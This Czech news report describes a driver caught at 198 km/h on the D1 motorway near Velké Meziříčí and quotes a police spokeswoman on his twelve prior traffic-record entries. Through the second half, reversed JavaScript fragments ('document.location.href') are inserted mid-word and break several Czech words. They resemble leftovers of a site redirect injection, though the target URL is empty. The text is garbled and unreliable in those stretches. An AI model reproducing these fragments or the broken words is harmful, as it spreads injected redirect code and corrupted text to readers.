Rainbow page separator

Řidič jel 198 kilometrů v hodině, měl už dvanáct záznamů

Pátek, 22. ledna 2021

Vysočina / Výrazné překročení nejvyšší povolené rychlosti na dálnici D1 zjistili v úterý 19. ledna odpoledne policisté z dálničního oddělení ve Velkém Beranově.
„Policejní hlídka zaregistrovala na 105. kilometru dálnice ve směru jízdy na Brno rychle jedoucí osobní vozidlo Mercedes Benz GLE 350 s českou registrační značkou. Radarové zařízení ve služebním vozidle Škoda Superb naměřilo projíždějícímu řidiči rychlost 198 kilometrů v hodině v místě, kde je nejvyšší povolená rychlost stanovena na 130 kilometrů,“ přiblížila policejní mluvčí Dana Čírtková.
Hlídka mercedes zastavila na dálničním odpočívadle na 111. kilometru. Policisté u dvaatřicetiletého řidiče také provedli dechovou zkoušku s negativním výsledkem. Dopravní přestupek v podobě překročení nejvyšší povolené rychlosti nebylo možné vyřídit na místě, pročež byl pos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupen místně příslušnému správnímu orgánu do správního řízení. Tam řidiči za přestupek hrozí pokuta až deset tisíc korun a zákaz řízení nejvíce na jeden rok. „V případě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to řidiče s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí za zmínku, že s pácháním přestupků v dopravě má bohaté zkušenosti, o čemž svědčí dvanáct záznamů v evidenční kartě řidiče a skutečnost, že v průběhu uplynulých deseti let měl čtyřikrát vyslovený zákaz řízení mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torových vozidel,“ doplnila mluvčí.